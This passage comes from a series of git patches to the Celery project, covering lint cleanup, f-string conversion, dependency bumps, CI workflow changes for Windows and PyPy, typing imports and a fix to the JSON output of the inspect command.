index 80fb523a742..617e9187567 100644
--- a/examples/eventlet/webcrawler.py
+++ b/examples/eventlet/webcrawler.py
@@ -23,15 +23,15 @@
import re
import requests
-
-from celery import group, task
from eventlet import Timeout
from pybloom import BloomFilter
+from celery import group, task
+
try:
from urllib.parse import urlsplit
except ImportError:
- from urlparse import urlsplit # noqa
+ from urlparse import urlsplit
# http://daringfireball.net/2009/11/liberal_regex_for_matching_urls
url_regex = re.compile(
diff --git a/setup.cfg b/setup.cfg
index fc8847c6200..448e97dce2a 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -14,6 +14,7 @@ all_files = 1
# whenever it makes the code more readable.
max-line-length = 117
extend-ignore =
+ E203, # incompatible with black https://github.com/psf/black/issues/315#issuecomment-395457972
D102, # Missing docstring in public method
D104, # Missing docstring in public package
D105, # Missing docstring in magic method
diff --git a/t/benchmarks/bench_worker.py b/t/benchmarks/bench_worker.py
index a2102b8bf19..adc88ede47b 100644
--- a/t/benchmarks/bench_worker.py
+++ b/t/benchmarks/bench_worker.py
@@ -1,7 +1,7 @@
import os
import sys
-from celery import Celery # noqa
+from celery import Celery
os.environ.update(
NOSETPS='yes',
@@ -48,13 +48,13 @@ def it(_, n):
# by previous runs, or the broker.
i = it.cur
if i and not i % 5000:
- print('({} so far: {}s)'.format(i, tdiff(it.subt)), file=sys.stderr)
+ print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr)
it.subt = time.monotonic()
if not i:
it.subt = it.time_start = time.monotonic()
elif i > n - 2:
total = tdiff(it.time_start)
- print('({} so far: {}s)'.format(i, tdiff(it.subt)), file=sys.stderr)
+ print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr)
print('-- process {} tasks: {}s total, {} tasks/s'.format(
n, total, n / (total + .0),
))
@@ -68,7 +68,7 @@ def bench_apply(n=DEFAULT_ITS):
task = it._get_current_object()
with app.producer_or_acquire() as producer:
[task.apply_async((i, n), producer=producer) for i in range(n)]
- print('-- apply {} tasks: {}s'.format(n, time.monotonic() - time_start))
+ print(f'-- apply {n} tasks: {time.monotonic() - time_start}s')
def bench_work(n=DEFAULT_ITS, loglevel='CRITICAL'):
diff --git a/t/distro/test_CI_reqs.py b/t/distro/test_CI_reqs.py
index a45f3622390..861e30b905e 100644
--- a/t/distro/test_CI_reqs.py
+++ b/t/distro/test_CI_reqs.py
@@ -31,5 +31,5 @@ def test_all_reqs_enabled_in_tests():
defined = ci_default | ci_base
all_extras = _get_all_extras()
diff = all_extras - defined
- print('Missing CI reqs:\n{}'.format(pprint.pformat(diff)))
+ print(f'Missing CI reqs:\n{pprint.pformat(diff)}')
assert not diff
diff --git a/t/integration/test_canvas.py b/t/integration/test_canvas.py
index 2c48d43e07e..3109d021a33 100644
--- a/t/integration/test_canvas.py
+++ b/t/integration/test_canvas.py
@@ -93,7 +93,7 @@ def await_redis_count(expected_count, redis_key="redis-count", timeout=TIMEOUT):
# try again later
sleep(check_interval)
else:
- raise TimeoutError("{!r} was never incremented".format(redis_key))
+ raise TimeoutError(f"{redis_key!r} was never incremented")
# There should be no more increments - block momentarily
sleep(min(1, timeout))
diff --git a/t/unit/backends/test_arangodb.py b/t/unit/backends/test_arangodb.py
index 82dd49d1514..2cb2f33c9db 100644
--- a/t/unit/backends/test_arangodb.py
+++ b/t/unit/backends/test_arangodb.py
@@ -12,7 +12,7 @@
try:
import pyArango
except ImportError:
- pyArango = None # noqa
+ pyArango = None
pytest.importorskip('pyArango')
diff --git a/t/unit/backends/test_couchbase.py b/t/unit/backends/test_couchbase.py
index a29110c9439..297735a38ba 100644
--- a/t/unit/backends/test_couchbase.py
+++ b/t/unit/backends/test_couchbase.py
@@ -13,7 +13,7 @@
try:
import couchbase
except ImportError:
- couchbase = None # noqa
+ couchbase = None
COUCHBASE_BUCKET = 'celery_bucket'
diff --git a/t/unit/backends/test_couchdb.py b/t/unit/backends/test_couchdb.py
index c8b4a43ec2c..41505594f72 100644
--- a/t/unit/backends/test_couchdb.py
+++ b/t/unit/backends/test_couchdb.py
@@ -11,7 +11,7 @@
try:
import pycouchdb
except ImportError:
- pycouchdb = None # noqa
+ pycouchdb = None
COUCHDB_CONTAINER = 'celery_container'
diff --git a/t/unit/backends/test_dynamodb.py b/t/unit/backends/test_dynamodb.py
index 62f50b6625b..6fd2625c0cb 100644
--- a/t/unit/backends/test_dynamodb.py
+++ b/t/unit/backends/test_dynamodb.py
@@ -13,7 +13,7 @@
class test_DynamoDBBackend:
def setup(self):
- self._static_timestamp = Decimal(1483425566.52) # noqa
+ self._static_timestamp = Decimal(1483425566.52)
self.app.conf.result_backend = 'dynamodb://'
@property
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index 275d4f2f521..f240123a448 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -36,8 +36,8 @@ def stop(self):
def apply_async(self, *args, **kwargs):
pass
- mp = _mp() # noqa
- asynpool = None # noqa
+ mp = _mp()
+ asynpool = None
class MockResult:
diff --git a/t/unit/conftest.py b/t/unit/conftest.py
index d355fe31edd..90dc50682d5 100644
--- a/t/unit/conftest.py
+++ b/t/unit/conftest.py
@@ -27,7 +27,7 @@
)
try:
- WindowsError = WindowsError # noqa
+ WindowsError = WindowsError
except NameError:
class WindowsError(Exception):
diff --git a/t/unit/contrib/test_sphinx.py b/t/unit/contrib/test_sphinx.py
index de0d04aa5af..a4d74e04465 100644
--- a/t/unit/contrib/test_sphinx.py
+++ b/t/unit/contrib/test_sphinx.py
@@ -21,7 +21,6 @@ def test_sphinx():
app = TestApp(srcdir=SRCDIR, confdir=SRCDIR)
app.build()
contents = open(os.path.join(app.outdir, 'contents.html'),
- mode='r',
encoding='utf-8').read()
assert 'This is a sample Task' in contents
assert 'This is a sample Shared Task' in contents
diff --git a/t/unit/utils/test_dispatcher.py b/t/unit/utils/test_dispatcher.py
index b5e11c40bb8..b100b68b800 100644
--- a/t/unit/utils/test_dispatcher.py
+++ b/t/unit/utils/test_dispatcher.py
@@ -15,13 +15,13 @@ def garbage_collect():
elif hasattr(sys, 'pypy_version_info'):
- def garbage_collect(): # noqa
+ def garbage_collect():
# Collecting weakreferences can take two collections on PyPy.
gc.collect()
gc.collect()
else:
- def garbage_collect(): # noqa
+ def garbage_collect():
gc.collect()
diff --git a/t/unit/utils/test_functional.py b/t/unit/utils/test_functional.py
index 8312b8fd7ca..721fd414a3e 100644
--- a/t/unit/utils/test_functional.py
+++ b/t/unit/utils/test_functional.py
@@ -279,7 +279,7 @@ class test_head_from_fun:
def test_from_cls(self):
class X:
- def __call__(x, y, kwarg=1): # noqa
+ def __call__(x, y, kwarg=1):
pass
g = head_from_fun(X())
@@ -406,7 +406,7 @@ def fun(a, b, foo):
])
def test_seq_concat_seq(a, b, expected):
res = seq_concat_seq(a, b)
- assert type(res) is type(expected) # noqa
+ assert type(res) is type(expected)
assert res == expected
@@ -416,7 +416,7 @@ def test_seq_concat_seq(a, b, expected):
])
def test_seq_concat_item(a, b, expected):
res = seq_concat_item(a, b)
- assert type(res) is type(expected) # noqa
+ assert type(res) is type(expected)
assert res == expected
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index f218857d605..256a7d6cefe 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -26,7 +26,7 @@
try:
import resource
except ImportError: # pragma: no cover
- resource = None # noqa
+ resource = None
def test_isatty():
diff --git a/t/unit/worker/test_control.py b/t/unit/worker/test_control.py
index 72ea98c4603..8e1e02d64df 100644
--- a/t/unit/worker/test_control.py
+++ b/t/unit/worker/test_control.py
@@ -11,7 +11,7 @@
from celery.utils.collections import AttributeDict
from celery.utils.timer2 import Timer
-from celery.worker import WorkController as _WC # noqa
+from celery.worker import WorkController as _WC
from celery.worker import consumer, control
from celery.worker import state as worker_state
from celery.worker.pidbox import Pidbox, gPidbox
diff --git a/tox.ini b/tox.ini
index 6c74e65576b..5e0b4a73f76 100644
--- a/tox.ini
+++ b/tox.ini
@@ -38,7 +38,7 @@ deps=
integration: -r{toxinidir}/requirements/test-integration.txt
linkcheck,apicheck,configcheck: -r{toxinidir}/requirements/docs.txt
- flake8: -r{toxinidir}/requirements/pkgutils.txt
+ lint: pre-commit
bandit: bandit
commands =
@@ -79,7 +79,7 @@ basepython =
3.9: python3.9
3.10: python3.10
pypy3: pypy3
- flake8,apicheck,linkcheck,configcheck,bandit: python3.9
+ lint,apicheck,linkcheck,configcheck,bandit: python3.9
usedevelop = True
@@ -101,6 +101,6 @@ commands =
commands =
bandit -b bandit.json -r celery/
-[testenv:flake8]
+[testenv:lint]
commands =
- flake8 -j 2 {toxinidir}
+ pre-commit {posargs:run --all-files --show-diff-on-failure}
From ef026ea44f59e5d234c195c3ce73927f8323f9ee Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Tue, 20 Jul 2021 17:19:02 +0100
Subject: [PATCH 016/177] relaxed click version (#6861)
* relaxed click version
* fix get_default
* pre-check WorkersPool click.Choice type before calling super
https://github.com/pallets/click/issues/1898#issuecomment-841546735
* apply pre-commit run --all-files
Co-authored-by: Asif Saif Uddin
---
celery/bin/base.py | 4 ++--
celery/bin/worker.py | 4 ++++
requirements/default.txt | 4 ++--
3 files changed, 8 insertions(+), 4 deletions(-)
diff --git a/celery/bin/base.py b/celery/bin/base.py
index 0eba53e1ce0..95af1a89316 100644
--- a/celery/bin/base.py
+++ b/celery/bin/base.py
@@ -138,10 +138,10 @@ def caller(ctx, *args, **kwargs):
class CeleryOption(click.Option):
"""Customized option for Celery."""
- def get_default(self, ctx):
+ def get_default(self, ctx, *args, **kwargs):
if self.default_value_from_context:
self.default = ctx.obj[self.default_value_from_context]
- return super().get_default(ctx)
+ return super().get_default(ctx, *args, **kwargs)
def __init__(self, *args, **kwargs):
"""Initialize a Celery option."""
diff --git a/celery/bin/worker.py b/celery/bin/worker.py
index eecd8743abe..68a0d117247 100644
--- a/celery/bin/worker.py
+++ b/celery/bin/worker.py
@@ -11,6 +11,7 @@
from celery.bin.base import (COMMA_SEPARATED_LIST, LOG_LEVEL,
CeleryDaemonCommand, CeleryOption,
handle_preload_options)
+from celery.concurrency.base import BasePool
from celery.exceptions import SecurityError
from celery.platforms import (EX_FAILURE, EX_OK, detached,
maybe_drop_privileges)
@@ -45,6 +46,9 @@ def __init__(self):
def convert(self, value, param, ctx):
# Pools like eventlet/gevent needs to patch libs as early
# as possible.
+ if isinstance(value, type) and issubclass(value, BasePool):
+ return value
+
value = super().convert(value, param, ctx)
worker_pool = ctx.obj.app.conf.worker_pool
if value == 'prefork' and worker_pool:
diff --git a/requirements/default.txt b/requirements/default.txt
index afa9d16f251..b892226269a 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -2,8 +2,8 @@ pytz>dev
billiard>=3.6.4.0,<4.0
kombu>=5.1.0,<6.0
vine>=5.0.0,<6.0
-click>=7.0,<8.0
+click>=8.0,<9.0
click-didyoumean>=0.0.3
-click-repl>=0.1.6
+click-repl>=0.2.0
click-plugins>=1.1.1
setuptools
From 11f816bbfcceab641ecb9db35688996a864b67ec Mon Sep 17 00:00:00 2001
From: maybe-sybr <58414429+maybe-sybr@users.noreply.github.com>
Date: Wed, 21 Jul 2021 14:05:14 +1000
Subject: [PATCH 017/177] doc: Amend IRC network link to Libera (#6837)
* doc: Amend IRC network link to Libera
Ref #6811
* Update README.rst
Co-authored-by: Thomas Grainger
Co-authored-by: Asif Saif Uddin
Co-authored-by: Thomas Grainger
---
README.rst | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.rst b/README.rst
index ee7c1f84306..a4f05abf96d 100644
--- a/README.rst
+++ b/README.rst
@@ -421,10 +421,10 @@ please join the `celery-users`_ mailing list.
IRC
---
-Come chat with us on IRC. The **#celery** channel is located at the `Freenode`_
-network.
+Come chat with us on IRC. The **#celery** channel is located at the
+`Libera Chat`_ network.
-.. _`Freenode`: https://freenode.net
+.. _`Libera Chat`: https://libera.chat/
.. _bug-tracker:
From c557c750dd5e84b6f219094e46dbf7c30d0a15fa Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Wed, 21 Jul 2021 13:30:09 +0300
Subject: [PATCH 018/177] Run CI on the 5.0 branch as well.
---
.github/workflows/python-package.yml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 42c56683e4a..a515d3de55d 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -5,13 +5,13 @@ name: Celery
on:
push:
- branches: [ master ]
+ branches: [ 'master', '5.0' ]
paths:
- '**.py'
- '**.txt'
- '.github/workflows/python-package.yml'
pull_request:
- branches: [ master ]
+ branches: [ 'master', '5.0' ]
paths:
- '**.py'
- '**.txt'
From 59d88326b8caa84083c01efb3a3983b3332853e9 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Thu, 22 Jul 2021 09:00:57 +0100
Subject: [PATCH 019/177] test on 3.10.b4 (#6867)
---
.github/workflows/python-package.yml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index a515d3de55d..5ca6f54fdb1 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,8 +24,8 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.3', 'pypy3']
- continue-on-error: ${{ matrix.python-version == '3.10.0-beta.3' }}
+ python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy3']
+ continue-on-error: ${{ startsWith(matrix.python-version, '3.10.0-beta.') }}
steps:
- name: Install apt packages
From bb8030562752dbcd1d130a878f4a0326ad93fc02 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Thu, 22 Jul 2021 10:22:28 +0100
Subject: [PATCH 020/177] create github action for windows (#6271)
* create github action for windows
* increase tox verbosity
* configure pip caching/requirements
* Update .github/workflows/windows.yml
* define kombu sqs passthrough dep
* drop 3.9 from windows due to pycurl
* skip test_check_privileges_suspicious_platform[accept_content0] on win32, py38+
* fails on py38+ win32
* bump the maxfail a bit to get more error context
* xfail all py3.8+ windows tests
* re-enable -v
* pytest.raises does not raise AssertionError
https://github.com/pytest-dev/pytest/issues/8928
* more xfails
* merge windows workflow into python-package
* only install apt packages on ubuntu-*
* bust pip cache with matrix.os
* step.if doesn't need {{
* Update python-package.yml
* Windows is never considered a sus platform
this is because Microsoft is beyond reproach
* fix merge resolution error
---
.github/workflows/python-package.yml | 15 ++++++++++++---
requirements/extras/sqs.txt | 3 +--
t/unit/utils/test_platforms.py | 15 ++++++++++++++-
tox.ini | 2 +-
4 files changed, 28 insertions(+), 7 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 5ca6f54fdb1..93e4ae9a13e 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -20,15 +20,24 @@ on:
jobs:
build:
- runs-on: ubuntu-20.04
+ runs-on: ${{ matrix.os }}
strategy:
fail-fast: false
matrix:
python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy3']
+ os: ["ubuntu-20.04", "windows-2019"]
+ exclude:
+ - os: windows-2019
+ python-version: "pypy3"
+ - os: windows-2019
+ python-version: "3.10.0-beta.4"
+ - os: windows-2019
+ python-version: "3.9"
continue-on-error: ${{ startsWith(matrix.python-version, '3.10.0-beta.') }}
steps:
- name: Install apt packages
+ if: startsWith(matrix.os, 'ubuntu-')
run: |
sudo apt update && sudo apt-get install -f libcurl4-openssl-dev libssl-dev gnutls-dev httping expect libmemcached-dev
- uses: actions/checkout@v2
@@ -46,9 +55,9 @@ jobs:
with:
path: ${{ steps.pip-cache.outputs.dir }}
key:
- ${{ matrix.python-version }}-v1-${{ hashFiles('**/setup.py') }}
+ ${{ matrix.python-version }}-${{matrix.os}}-${{ hashFiles('**/setup.py') }}
restore-keys: |
- ${{ matrix.python-version }}-v1-
+ ${{ matrix.python-version }}-${{matrix.os}}
- name: Install tox
run: python -m pip install tox tox-gh-actions
diff --git a/requirements/extras/sqs.txt b/requirements/extras/sqs.txt
index d4a662987a7..8a7fc342f07 100644
--- a/requirements/extras/sqs.txt
+++ b/requirements/extras/sqs.txt
@@ -1,2 +1 @@
-boto3>=1.9.125
-pycurl==7.43.0.5 # Latest version with wheel built (for appveyor)
+kombu[sqs]
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index 256a7d6cefe..f0b1fde8d3a 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -825,10 +825,17 @@ def test_setgroups_raises_EPERM(self, hack, getgroups):
getgroups.assert_called_with()
+fails_on_win32 = pytest.mark.xfail(
+ sys.platform == "win32",
+ reason="fails on py38+ windows",
+)
+
+
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
- {'pickle', 'application/group-python-serialize'}
+ {'pickle', 'application/group-python-serialize'},
])
@patch('celery.platforms.os')
def test_check_privileges_suspicious_platform(os_module, accept_content):
@@ -866,6 +873,7 @@ def test_check_privileges_no_fchown(os_module, accept_content, recwarn):
assert len(recwarn) == 0
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
@@ -886,6 +894,7 @@ def test_check_privileges_without_c_force_root(os_module, accept_content):
check_privileges(accept_content)
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
@@ -903,6 +912,7 @@ def test_check_privileges_with_c_force_root(os_module, accept_content):
check_privileges(accept_content)
+@fails_on_win32
@pytest.mark.parametrize(('accept_content', 'group_name'), [
({'pickle'}, 'sudo'),
({'application/group-python-serialize'}, 'sudo'),
@@ -931,6 +941,7 @@ def test_check_privileges_with_c_force_root_and_with_suspicious_group(
check_privileges(accept_content)
+@fails_on_win32
@pytest.mark.parametrize(('accept_content', 'group_name'), [
({'pickle'}, 'sudo'),
({'application/group-python-serialize'}, 'sudo'),
@@ -960,6 +971,7 @@ def test_check_privileges_without_c_force_root_and_with_suspicious_group(
check_privileges(accept_content)
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
@@ -988,6 +1000,7 @@ def test_check_privileges_with_c_force_root_and_no_group_entry(
assert recwarn[1].message.args[0] == expected_message
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
diff --git a/tox.ini b/tox.ini
index 5e0b4a73f76..e3fb16cfc84 100644
--- a/tox.ini
+++ b/tox.ini
@@ -42,7 +42,7 @@ deps=
bandit: bandit
commands =
- unit: pytest -xv --cov=celery --cov-report=xml --cov-report term {posargs}
+ unit: pytest --maxfail=10 -v --cov=celery --cov-report=xml --cov-report term {posargs}
integration: pytest -xsv t/integration {posargs}
setenv =
BOTO_CONFIG = /dev/null
From ea1df2ba82e2492657c2e6c512f85a188ecdec18 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Fri, 23 Jul 2021 10:04:30 +0100
Subject: [PATCH 021/177] import celery lazily in pytest plugin and unignore
flake8 F821, "undefined name '...'" (#6872)
* unignore f821
* defer celery imports in celery pytest plugin
---
celery/contrib/pytest.py | 17 +++++++++++++++--
celery/contrib/testing/manager.py | 3 ++-
celery/contrib/testing/mocks.py | 6 +++++-
celery/contrib/testing/worker.py | 4 +++-
celery/events/state.py | 7 +++----
celery/platforms.py | 25 ++++++++++---------------
celery/utils/collections.py | 1 +
celery/utils/log.py | 1 +
celery/utils/saferepr.py | 2 ++
celery/utils/text.py | 1 +
setup.cfg | 1 -
t/benchmarks/bench_worker.py | 1 +
t/integration/test_canvas.py | 2 +-
13 files changed, 45 insertions(+), 26 deletions(-)
diff --git a/celery/contrib/pytest.py b/celery/contrib/pytest.py
index c54ea5cb0fa..f44a828ecaa 100644
--- a/celery/contrib/pytest.py
+++ b/celery/contrib/pytest.py
@@ -1,11 +1,17 @@
"""Fixtures and testing utilities for :pypi:`pytest `."""
import os
from contextlib import contextmanager
+from typing import TYPE_CHECKING, Any, Mapping, Sequence, Union
import pytest
-from .testing import worker
-from .testing.app import TestApp, setup_default_app
+if TYPE_CHECKING:
+ from celery import Celery
+
+ from ..worker import WorkController
+else:
+ Celery = WorkController = object
+
NO_WORKER = os.environ.get('NO_WORKER')
@@ -30,6 +36,9 @@ def _create_app(enable_logging=False,
**config):
# type: (Any, Any, Any, **Any) -> Celery
"""Utility context used to setup Celery app for pytest fixtures."""
+
+ from .testing.app import TestApp, setup_default_app
+
parameters = {} if not parameters else parameters
test_app = TestApp(
set_as_current=False,
@@ -83,6 +92,8 @@ def celery_session_worker(
):
# type: (...) -> WorkController
"""Session Fixture: Start worker that lives throughout test suite."""
+ from .testing import worker
+
if not NO_WORKER:
for module in celery_includes:
celery_session_app.loader.import_task_module(module)
@@ -188,6 +199,8 @@ def celery_worker(request,
celery_worker_parameters):
# type: (Any, Celery, Sequence[str], str, Any) -> WorkController
"""Fixture: Start worker in a thread, stop it when the test returns."""
+ from .testing import worker
+
if not NO_WORKER:
for module in celery_includes:
celery_app.loader.import_task_module(module)
diff --git a/celery/contrib/testing/manager.py b/celery/contrib/testing/manager.py
index d053a03e81a..5c5c3e7797c 100644
--- a/celery/contrib/testing/manager.py
+++ b/celery/contrib/testing/manager.py
@@ -4,12 +4,13 @@
from collections import defaultdict
from functools import partial
from itertools import count
+from typing import Any, Callable, Dict, Sequence, TextIO, Tuple
from kombu.utils.functional import retry_over_time
from celery import states
from celery.exceptions import TimeoutError
-from celery.result import ResultSet
+from celery.result import AsyncResult, ResultSet
from celery.utils.text import truncate
from celery.utils.time import humanize_seconds as _humanize_seconds
diff --git a/celery/contrib/testing/mocks.py b/celery/contrib/testing/mocks.py
index 6294e6905cb..82775011afc 100644
--- a/celery/contrib/testing/mocks.py
+++ b/celery/contrib/testing/mocks.py
@@ -1,6 +1,10 @@
"""Useful mocks for unit testing."""
import numbers
from datetime import datetime, timedelta
+from typing import Any, Mapping, Sequence
+
+from celery import Celery
+from celery.canvas import Signature
try:
from case import Mock
@@ -49,7 +53,7 @@ def TaskMessage1(
kwargs=None, # type: Mapping
callbacks=None, # type: Sequence[Signature]
errbacks=None, # type: Sequence[Signature]
- chain=None, # type: Squence[Signature]
+ chain=None, # type: Sequence[Signature]
**options # type: Any
):
# type: (...) -> Any
diff --git a/celery/contrib/testing/worker.py b/celery/contrib/testing/worker.py
index 09fecc0a7a2..b4e68cb8dec 100644
--- a/celery/contrib/testing/worker.py
+++ b/celery/contrib/testing/worker.py
@@ -2,8 +2,10 @@
import os
import threading
from contextlib import contextmanager
+from typing import Any, Iterable, Union
-from celery import worker
+import celery.worker.consumer
+from celery import Celery, worker
from celery.result import _set_task_join_will_block, allow_join_result
from celery.utils.dispatch import Signal
from celery.utils.nodenames import anon_nodename
diff --git a/celery/events/state.py b/celery/events/state.py
index f8ff9ad687e..087131aeec3 100644
--- a/celery/events/state.py
+++ b/celery/events/state.py
@@ -22,6 +22,7 @@
from itertools import islice
from operator import itemgetter
from time import time
+from typing import Mapping
from weakref import WeakSet, ref
from kombu.clocks import timetuple
@@ -429,15 +430,13 @@ def __init__(self, callback=None,
self._tasks_to_resolve = {}
self.rebuild_taskheap()
- # type: Mapping[TaskName, WeakSet[Task]]
self.tasks_by_type = CallableDefaultdict(
- self._tasks_by_type, WeakSet)
+ self._tasks_by_type, WeakSet) # type: Mapping[str, WeakSet[Task]]
self.tasks_by_type.update(
_deserialize_Task_WeakSet_Mapping(tasks_by_type, self.tasks))
- # type: Mapping[Hostname, WeakSet[Task]]
self.tasks_by_worker = CallableDefaultdict(
- self._tasks_by_worker, WeakSet)
+ self._tasks_by_worker, WeakSet) # type: Mapping[str, WeakSet[Task]]
self.tasks_by_worker.update(
_deserialize_Task_WeakSet_Mapping(tasks_by_worker, self.tasks))
diff --git a/celery/platforms.py b/celery/platforms.py
index 82fed9cb9f0..d2fe02bede3 100644
--- a/celery/platforms.py
+++ b/celery/platforms.py
@@ -581,6 +581,14 @@ def _setuid(uid, gid):
'non-root user able to restore privileges after setuid.')
+if hasattr(_signal, 'setitimer'):
+ def _arm_alarm(seconds):
+ _signal.setitimer(_signal.ITIMER_REAL, seconds)
+else:
+ def _arm_alarm(seconds):
+ _signal.alarm(math.ceil(seconds))
+
+
class Signals:
"""Convenience interface to :mod:`signals`.
@@ -619,21 +627,8 @@ class Signals:
ignored = _signal.SIG_IGN
default = _signal.SIG_DFL
- if hasattr(_signal, 'setitimer'):
-
- def arm_alarm(self, seconds):
- _signal.setitimer(_signal.ITIMER_REAL, seconds)
- else: # pragma: no cover
- try:
- from itimer import alarm as _itimer_alarm
- except ImportError:
-
- def arm_alarm(self, seconds):
- _signal.alarm(math.ceil(seconds))
- else: # pragma: no cover
-
- def arm_alarm(self, seconds):
- return _itimer_alarm(seconds)
+ def arm_alarm(self, seconds):
+ return _arm_alarm(seconds)
def reset_alarm(self):
return _signal.alarm(0)
diff --git a/celery/utils/collections.py b/celery/utils/collections.py
index 1fedc775771..df37d12c3b4 100644
--- a/celery/utils/collections.py
+++ b/celery/utils/collections.py
@@ -7,6 +7,7 @@
from heapq import heapify, heappop, heappush
from itertools import chain, count
from queue import Empty
+from typing import Any, Dict, Iterable, List
from .functional import first, uniq
from .text import match_case
diff --git a/celery/utils/log.py b/celery/utils/log.py
index 8ca34e7c5ae..48a2bc40897 100644
--- a/celery/utils/log.py
+++ b/celery/utils/log.py
@@ -6,6 +6,7 @@
import threading
import traceback
from contextlib import contextmanager
+from typing import AnyStr, Sequence
from kombu.log import LOG_LEVELS
from kombu.log import get_logger as _get_logger
diff --git a/celery/utils/saferepr.py b/celery/utils/saferepr.py
index d079734fc5d..adcfc72efca 100644
--- a/celery/utils/saferepr.py
+++ b/celery/utils/saferepr.py
@@ -15,6 +15,8 @@
from itertools import chain
from numbers import Number
from pprint import _recursion
+from typing import (Any, AnyStr, Callable, Dict, Iterator, List, Sequence,
+ Set, Tuple)
from .text import truncate
diff --git a/celery/utils/text.py b/celery/utils/text.py
index d685f7b8fc7..661a02fc002 100644
--- a/celery/utils/text.py
+++ b/celery/utils/text.py
@@ -5,6 +5,7 @@
from functools import partial
from pprint import pformat
from textwrap import fill
+from typing import Any, List, Mapping, Pattern
__all__ = (
'abbr', 'abbrtask', 'dedent', 'dedent_initial',
diff --git a/setup.cfg b/setup.cfg
index 448e97dce2a..3638e56dc6f 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -23,7 +23,6 @@ extend-ignore =
D412, # No blank lines allowed between a section header and its content
E741, # ambiguous variable name '...'
E742, # ambiguous class definition '...'
- F821, # undefined name '...'
per-file-ignores =
t/*,setup.py,examples/*,docs/*,extra/*:
# docstrings
diff --git a/t/benchmarks/bench_worker.py b/t/benchmarks/bench_worker.py
index adc88ede47b..5c9f6f46ba3 100644
--- a/t/benchmarks/bench_worker.py
+++ b/t/benchmarks/bench_worker.py
@@ -1,5 +1,6 @@
import os
import sys
+import time
from celery import Celery
diff --git a/t/integration/test_canvas.py b/t/integration/test_canvas.py
index 3109d021a33..11079a70d92 100644
--- a/t/integration/test_canvas.py
+++ b/t/integration/test_canvas.py
@@ -1538,7 +1538,7 @@ def test_chord_on_error(self, manager):
res.children[0].children[0].result
).result
failed_task_id = uuid_patt.search(str(callback_chord_exc))
- assert (failed_task_id is not None), "No task ID in %r" % callback_exc
+ assert (failed_task_id is not None), "No task ID in %r" % callback_chord_exc
failed_task_id = failed_task_id.group()
# Use new group_id result metadata to get group ID.
From afff659fcca833ea48483b219355044dc8de7aa2 Mon Sep 17 00:00:00 2001
From: Jonas Kittner
Date: Tue, 20 Jul 2021 19:48:21 +0200
Subject: [PATCH 022/177] fix inspect --json output to return valid json
without --quiet
---
celery/bin/control.py | 2 ++
1 file changed, 2 insertions(+)
diff --git a/celery/bin/control.py b/celery/bin/control.py
index a13963a54b3..fbd3730c490 100644
--- a/celery/bin/control.py
+++ b/celery/bin/control.py
@@ -144,6 +144,8 @@ def inspect(ctx, action, timeout, destination, json, **kwargs):
if json:
ctx.obj.echo(dumps(replies))
+ return
+
nodecount = len(replies)
if not ctx.obj.quiet:
ctx.obj.echo('\n{} {} online.'.format(
From 170e96a4c39366ba2c2f9120b042cd7f7c0a00be Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Mon, 26 Jul 2021 23:08:18 +0100
Subject: [PATCH 023/177] configure pypy3.7
---
.github/workflows/python-package.yml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 93e4ae9a13e..185072632dc 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,11 +24,13 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy3']
+ python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy-3.6', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
exclude:
- os: windows-2019
- python-version: "pypy3"
+ python-version: 'pypy-3.7'
+ - os: windows-2019
+ python-version: 'pypy-3.6'
- os: windows-2019
python-version: "3.10.0-beta.4"
- os: windows-2019
From f02d7c60051ce5202349fe7c795ebf5000d9526d Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
